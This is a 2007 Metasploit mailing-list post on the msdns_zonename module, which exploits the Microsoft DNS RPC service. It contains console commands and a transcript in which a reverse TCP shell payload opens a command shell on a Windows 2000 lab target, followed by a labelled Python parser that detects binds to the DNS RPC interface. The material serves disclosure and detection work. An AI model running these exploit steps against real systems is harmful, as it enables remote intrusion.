Metasploit mailing list archives

Exploiting the Microsoft DNS RPC service


From: giorgio.casali at gmail.com (Giorgio Casali)
Date: Tue, 17 Apr 2007 17:11:55 +0200

Hi,
is it possible to have it for the Italian version?
Thanks

2007/4/16, H D Moore <hdm at metasploit.com>:

The exploit module has been merged to stable, use 'Online Update' or 'svn
update' to grab it. The module's default target will exploit Windows 2000
SP0-SP4 and Windows 2003 SP0-SP2.

All targets are designed for the English locale. If you have a non-English
system, submit targets.

The Windows 2003 SP0 target may not be reliable.

The Windows 2003 SP1-SP2 targets will only work if hardware DEP is not in
use. We use the SEH overwrite method for all targets and the /GS stack
prevention means we will not be able to use standard hardware DEP bypass
techniques (return to NTDLL to disable NX).

The RPORT option defaults to '0' and will contact the endpoint mapper of
the target system in order to determine the real RPC port at runtime.
This saves a step, but it does mean that one of port 135 or 593 needs to
be accessible on the target. If you are attacking a system with only
ports > 1025 allowed through the firewall, you will need to locate the
RPC service and set RPORT manually.

To use the module, open the console interface, and run:
msf> use exploit/windows/dcerpc/msdns_zonename
msf exploit(msdns_zonename) >
msf exploit(msdns_zonename) > set PAYLOAD <your favorite payload>
msf exploit(msdns_zonename) > set <payload options>
msf exploit(msdns_zonename) > set RHOST <target>
msf exploit(msdns_zonename) > exploit

-- example --

< metasploit >
------------
       \   ,__,
        \  (oo)____
           (__)    )\
              ||--|| *


       =[ msf v3.0
+ -- --=[ 184 exploits - 104 payloads
+ -- --=[ 17 encoders - 5 nops
       =[ 33 aux

msf > use exploit/windows/dcerpc/msdns_zonename
msf exploit(msdns_zonename) > set PAYLOAD windows/shell_reverse_tcp
PAYLOAD => windows/shell_reverse_tcp
msf exploit(msdns_zonename) > set LHOST 192.168.0.127
LHOST => 192.168.0.127
msf exploit(msdns_zonename) > set LPORT 4444
LPORT => 4444
msf exploit(msdns_zonename) > set RHOST 172.16.233.128
RHOST => 172.16.233.128

msf exploit(msdns_zonename) > exploit
[*] Started reverse handler
[*] Connecting to the endpoint mapper service...
[*] Discovered Microsoft DNS Server RPC service on port 1356
[*] Trying target Windows 2000 SP0-SP4 / Windows 2003 SP0-SP2 English...
[*] Binding to 50abc2a4-574d-40b3-9d66-ee4fd5fba076:5.0 at ncacn_ip_tcp:172.16.233.128[0] ...
[*] Bound to 50abc2a4-574d-40b3-9d66-ee4fd5fba076:5.0 at ncacn_ip_tcp:172.16.233.128[0] ...
[*] Sending exploit...
[*] Error: no response from dcerpc service
[*] Command shell session 1 opened (192.168.0.127:4444 -> 192.168.0.127:45196)

Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.

c:\>
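From the monitoring side, the console output above shows the one thing that is constant across locales and service ports: the DCE/RPC bind to the DNS Server interface 50abc2a4-574d-40b3-9d66-ee4fd5fba076 version 5.0, on whatever port the endpoint mapper handed back. The following parser is an added example and is not part of this thread or of the Metasploit module; it decodes a little-endian DCE/RPC bind PDU, returns the interface UUID and version for each presentation context, and flags binds to that interface so a sensor on the DNS server's RPC port can alert on them. The `build_bind` helper only constructs the sample PDU used as input; the function names and the 5840-byte fragment sizes are my own choices.

```python
import struct
import uuid

# Interface UUID and version shown in the console output above
# ("Bound to 50abc2a4-...:5.0"): the Microsoft DNS Server RPC interface.
MSDNS_IFACE = uuid.UUID("50abc2a4-574d-40b3-9d66-ee4fd5fba076")
MSDNS_VERSION = "5.0"
# Standard NDR transfer syntax carried in every DCE/RPC bind.
NDR_SYNTAX = uuid.UUID("8a885d04-1ceb-11c9-9fe8-08002b104860")

PTYPE_BIND = 11          # DCE/RPC packet type for a bind request
HEADER_LEN = 16          # fixed DCE/RPC common header


def build_bind(iface, major, minor, call_id=1):
    """Constructed sample bind PDU (little-endian NDR), used only as test input
    for the parser below: one presentation context, one transfer syntax."""
    ctx = struct.pack("<HBB", 0, 1, 0)                        # ctx id, n_transfer, pad
    ctx += iface.bytes_le + struct.pack("<HH", major, minor)  # abstract syntax + version
    ctx += NDR_SYNTAX.bytes_le + struct.pack("<I", 2)         # transfer syntax v2.0
    body = struct.pack("<HHIB3x", 5840, 5840, 0, 1) + ctx     # frag sizes, assoc group, n_ctx
    frag_len = HEADER_LEN + len(body)
    hdr = struct.pack("<BBBB4sHHI", 5, 0, PTYPE_BIND, 0x03,
                      b"\x10\x00\x00\x00", frag_len, 0, call_id)
    return hdr + body


def parse_bind(pdu):
    """Return [(interface_uuid, 'major.minor'), ...] for each presentation
    context of a bind PDU, or None if the PDU is not a bind request.
    Raises ValueError on malformed or truncated input."""
    if len(pdu) < HEADER_LEN:
        raise ValueError("PDU shorter than DCE/RPC header")
    vers, _minor, ptype, _flags, drep, frag_len, _auth_len, _call_id = \
        struct.unpack("<BBBB4sHHI", pdu[:HEADER_LEN])
    if vers != 5 or ptype != PTYPE_BIND:
        return None
    if not drep[0] & 0x10:
        raise ValueError("big-endian data representation not handled here")
    if frag_len > len(pdu) or frag_len < HEADER_LEN + 12:
        raise ValueError("frag_length inconsistent with captured data")
    n_ctx = pdu[24]                    # after max_xmit(2), max_recv(2), assoc_group(4)
    off = HEADER_LEN + 12              # skip count byte and its 3 bytes of padding
    contexts = []
    for _ in range(n_ctx):
        if off + 24 > frag_len:
            raise ValueError("truncated presentation context")
        n_trans = pdu[off + 2]
        iface = uuid.UUID(bytes_le=pdu[off + 4:off + 20])
        major, minor = struct.unpack("<HH", pdu[off + 20:off + 24])
        off += 24 + 20 * n_trans       # each transfer syntax is UUID(16) + version(4)
        if off > frag_len:
            raise ValueError("truncated transfer syntax list")
        contexts.append((iface, f"{major}.{minor}"))
    return contexts


def binds_to_msdns(pdu):
    """Detection predicate: True if any context of this bind targets the
    DNS Server RPC interface, whatever version is requested."""
    contexts = parse_bind(pdu)
    return bool(contexts) and any(i == MSDNS_IFACE for i, _ in contexts)


if __name__ == "__main__":
    sample = build_bind(MSDNS_IFACE, 5, 0)
    print(parse_bind(sample), binds_to_msdns(sample))
```

Because the module asks the endpoint mapper on 135 or 593 for the real port first, a sensor that only watches fixed ports misses the bind; feeding it the port learned from the endpoint mapper reply, or inspecting every TCP stream for a bind PDU regardless of port, is what makes this predicate useful in practice.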
